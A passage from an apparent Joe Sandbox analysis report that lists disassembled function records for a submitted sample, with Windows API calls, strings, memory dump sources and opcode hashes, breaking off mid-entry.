                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction ID: 365ff23fec7c9aa855162b348f047adf52b1e768aa011a5cea3adb3641f088ea
                                                                                              • Opcode Fuzzy Hash: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction Fuzzy Hash: D4A17B7AE803969FDB12CF58C8927AEBBE4EFB5310F18416DE4959B282C2348D41C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00A28D5C,?,?,?), ref: 00A2B7F3
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00A28D5C,?,?), ref: 00A2B837
                                                                                              • SetFileTime.KERNEL32(?,00A28AEC,?,00000000,?,00000800,?,00A28D5C,?,?,?,?,?,?,?,?), ref: 00A2B8B8
                                                                                              • CloseHandle.KERNEL32(?,?,00000800,?,00A28D5C,?,?,?,?,?,?,?,?,?,?), ref: 00A2B8BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: a75b5d23b5b1220dcac6375ebe401860620c951cb546f86e7d202970fb456df5
                                                                                              • Instruction ID: 3e4cb83e413dbe7611a353a304b36d7fad273fe7fee6f32f51cbd89b066ae020
                                                                                              • Opcode Fuzzy Hash: a75b5d23b5b1220dcac6375ebe401860620c951cb546f86e7d202970fb456df5
                                                                                              • Instruction Fuzzy Hash: 5441F030258391ABE720DF28EC41BAABBE8AF84300F04092DF5D5931D1D764DA48DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: 1f938b17b26009208316ebd7a0833009d1feb3cd1cd9a70fcd48cb22717c07f8
                                                                                              • Instruction ID: 68853dd0dfba67e7d886112e75808021b995f1b7f9f5d33039ade15508fbf908
                                                                                              • Opcode Fuzzy Hash: 1f938b17b26009208316ebd7a0833009d1feb3cd1cd9a70fcd48cb22717c07f8
                                                                                              • Instruction Fuzzy Hash: B341BF71E006299BCB11DFB89D49AEEBBB8EF54310F000129FD05F7245DA74AD498BE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A28532
                                                                                              • _wcslen.LIBCMT ref: 00A28558
                                                                                              • _wcslen.LIBCMT ref: 00A285EF
                                                                                              • _wcslen.LIBCMT ref: 00A28657
                                                                                                • Part of subcall function 00A2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
                                                                                                • Part of subcall function 00A2B41F: RemoveDirectoryW.KERNEL32(?,?,?,00A28649,?), ref: 00A2B430
                                                                                                • Part of subcall function 00A2B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00A28649,?), ref: 00A2B45E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 973666142-0
                                                                                              • Opcode ID: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction ID: e7bd31c0beac669eae255d12598a0c1a053422ee1513b0deb73defc076edce9e
                                                                                              • Opcode Fuzzy Hash: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction Fuzzy Hash: 0931C6718012749ACF21AF68AD41BEE3365AF54780F044475F945A714AEF78DEC5CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A4A871,?,00000000,?,00000001,?,?,00000001,00A4A871,?), ref: 00A4DB95
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A4DC1E
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A480B1,?), ref: 00A4DC30
• __freea.LIBCMT ref: 00A4DC39
  • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: ed2b74cf77a7ef34ebffb174128143845ce66b9fd26aee5432157da952b79578
• Instruction ID: a54e03c2179b12abbabe6f492f020ad256207972e4d47919e598254f6c5c462b
• Opcode Fuzzy Hash: ed2b74cf77a7ef34ebffb174128143845ce66b9fd26aee5432157da952b79578
• Instruction Fuzzy Hash: F1319A76A0020AABDF25DFB4CC81EAF7BA5EF84310B154268FC04D6250EB35DD91CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000020,?), ref: 00A28713
• OpenProcessToken.ADVAPI32(00000000), ref: 00A2871A
• GetLastError.KERNEL32 ref: 00A28759
• CloseHandle.KERNEL32(?), ref: 00A28768
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Process$CloseCurrentErrorHandleLastOpenToken
• String ID:
• API String ID: 2767541406-0
• Opcode ID: 5f2a74363dfde3fe75854e594d138af102bfecb3518bfdd646f54842e84b6d69
• Instruction ID: 0d203ce95dc8639c6bcad5c2aa78a7e47bb57f77e00af24bc7d495ea8670a9bb
• Opcode Fuzzy Hash: 5f2a74363dfde3fe75854e594d138af102bfecb3518bfdd646f54842e84b6d69
• Instruction Fuzzy Hash: BB01FBB5900219AFEB10DFE4AD89AAE7B7CBB04745F604025BA02A1150EB34CE45AA71
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 00A3B676
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00A3B685
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A3B693
• ReleaseDC.USER32(00000000,00000000), ref: 00A3B6A1
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: ce025e75fbb121ca7120c14185b345d0353e904e46aba546a4b532fb8c00abad
• Instruction ID: bc1801adc91a965ad591658514613c28ef62e532ae64c35c073d08fd53c0198a
• Opcode Fuzzy Hash: ce025e75fbb121ca7120c14185b345d0353e904e46aba546a4b532fb8c00abad
• Instruction Fuzzy Hash: 79E0EC31D95F60ABD720ABF0AC1DB9A3FA4AF15712F040115FB01A6190CBB044028FE1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A3B6A9: GetDC.USER32(00000000), ref: 00A3B6AD
  • Part of subcall function 00A3B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A3B6B8
  • Part of subcall function 00A3B6A9: ReleaseDC.USER32(00000000,00000000), ref: 00A3B6C3
• GetObjectW.GDI32(?,00000018,?), ref: 00A3B84C
  • Part of subcall function 00A3BADE: GetDC.USER32(00000000), ref: 00A3BAE7
  • Part of subcall function 00A3BADE: GetObjectW.GDI32(?,00000018,?), ref: 00A3BB16
  • Part of subcall function 00A3BADE: ReleaseDC.USER32(00000000,?), ref: 00A3BBAE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: (
• API String ID: 1061551593-3887548279
• Opcode ID: c6356c64067941720374ac4f9a177b27bc4b54c1dad6322b0797a30a6abce4f2
• Instruction ID: f860975bcacd02e27bc529ea718f95472a951108e8d3085bde5f6da528070a57
• Opcode Fuzzy Hash: c6356c64067941720374ac4f9a177b27bc4b54c1dad6322b0797a30a6abce4f2
• Instruction Fuzzy Hash: AA91E0B1608754AFD610DF65C844A6BBBF9FFC9705F00491EF99AD3260DB30A846CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A280C3
  • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
  • Part of subcall function 00A2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A28262
  • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
  • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: File$Attributes$CloseFindH_prologTime_wcslen
• String ID: :
• API String ID: 3226429890-336475711
• Opcode ID: 847c07a0c8c64f2e133daf31a886c5791a75cbcf6b6da047f25588c6d77ec748
• Instruction ID: 6c981e3bb28ee374d053a98afb429388cd417330d3d639f3d8a4aee72762153d
• Opcode Fuzzy Hash: 847c07a0c8c64f2e133daf31a886c5791a75cbcf6b6da047f25588c6d77ec748
• Instruction Fuzzy Hash: 53518471800278AAEB25EB54DD56EEE737DAF55300F0041B5F609A2082DB785F89CF61
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _wcslen
• String ID: }
• API String ID: 176396367-4239843852
• Opcode ID: b2e0a767a42aeb2697b79011e3d8be24f883491838920de173c1b5e78846afbb
• Instruction ID: 4bd86c2c6113b06f6a4af23692c827e9486c109822abe213a91ad40173afacd4
• Opcode Fuzzy Hash: b2e0a767a42aeb2697b79011e3d8be24f883491838920de173c1b5e78846afbb
• Instruction Fuzzy Hash: AC21E4729083166AD731EB64DE46A6BB3ECDF85770F10042AF940E3141FB75ED4887A2
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A30627: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A30646
  • Part of subcall function 00A30627: GetProcAddress.KERNEL32(00A6A1F0,CryptUnprotectMemory), ref: 00A30656
• GetCurrentProcessId.KERNEL32(?,00000200,?,00A30697), ref: 00A3072A
Strings
• CryptUnprotectMemory failed, xrefs: 00A30722
• CryptProtectMemory failed, xrefs: 00A306E1
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: a0b1e9a34959d0b3f11f78697a18c76661a7dbce1a3b1defe65d29a40ca33ccc
• Instruction ID: ae6f7815a9ca57243b9426dbd73609ff5a2a8d3e0f00988e4238265a37d375b5
• Opcode Fuzzy Hash: a0b1e9a34959d0b3f11f78697a18c76661a7dbce1a3b1defe65d29a40ca33ccc
• Instruction Fuzzy Hash: 49112631A00A64ABDF119F24AC62E6E3B68FF54B68F064215FC016B291D770AD828ED5
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00A2CDE7
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: 346948d6655ab3d53217b4f871be245a80085708e0eb0ac520f6eba8a6d94acd
                                                                                              • Instruction ID: d074d2097bfc162fc37d293830e50c39ea587cdb2e630029a3045bd191c51866
                                                                                              • Opcode Fuzzy Hash: 346948d6655ab3d53217b4f871be245a80085708e0eb0ac520f6eba8a6d94acd
                                                                                              • Instruction Fuzzy Hash: BA01F5671043217ADA306B6DAC47D6FA7BCEFD5770B40442AF844D6082EA30D850C2A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(0001046C), ref: 00A3EF2A
                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001046C,00A3C460,?), ref: 00A3EF65
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 3157717868-3292211884
                                                                                              • Opcode ID: 863d9c98ac6dae7def033f48a23634f07e53105cafcacbeccb4bcf2f326f5097
                                                                                              • Instruction ID: f69b7586e51d884f0b8c34ee1a96cd5dfcf6fa2d12634f1ab307097216a68142
                                                                                              • Opcode Fuzzy Hash: 863d9c98ac6dae7def033f48a23634f07e53105cafcacbeccb4bcf2f326f5097
                                                                                              • Instruction Fuzzy Hash: 9011E5356452A47FDB11DBB8AC16FEA37A8BB05741F148121F845A20D1CAF0AC85DF72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00A32480,?,00000000,00000000), ref: 00A32362
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00A323A9
                                                                                                • Part of subcall function 00A276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A27707
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: 537529b1dc4e3a4934decdba9b7c560b04507cb25ea50a11e8dc0454c427d737
                                                                                              • Instruction ID: e24a904c29d82e3f5c37e053a6cbcd7260543e075c80b0d629594ddc4087a95d
                                                                                              • Opcode Fuzzy Hash: 537529b1dc4e3a4934decdba9b7c560b04507cb25ea50a11e8dc0454c427d737
                                                                                              • Instruction Fuzzy Hash: EC01D6B63487027FD620AF64EC82F66B3A8FB44712F20053DF6469A1D0CAB1A8858720
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A2F608: _swprintf.LIBCMT ref: 00A2F62E
                                                                                                • Part of subcall function 00A2F608: _strlen.LIBCMT ref: 00A2F64F
                                                                                                • Part of subcall function 00A2F608: SetDlgItemTextW.USER32(?,00A60274,?), ref: 00A2F6AF
                                                                                                • Part of subcall function 00A2F608: GetWindowRect.USER32(?,?), ref: 00A2F6E9
                                                                                                • Part of subcall function 00A2F608: GetClientRect.USER32(?,?), ref: 00A2F6F5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                              • SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: 120d24353b4542800a7d7a90f819727e0c72a54b9bf4b5d5fcb36c3f69a843df
                                                                                              • Instruction ID: e92cc92d881540042717d256948edcd0b660666fca021f4c40b7d17af6e8608a
                                                                                              • Opcode Fuzzy Hash: 120d24353b4542800a7d7a90f819727e0c72a54b9bf4b5d5fcb36c3f69a843df
                                                                                              • Instruction Fuzzy Hash: 20F02231000398BBDF569F68AC0CBF93BAABF24389F444134FE44484A1CB74C985EB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00A32526,?), ref: 00A32309
                                                                                              • GetLastError.KERNEL32(?), ref: 00A32315
                                                                                                • Part of subcall function 00A276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A27707
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A3231E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
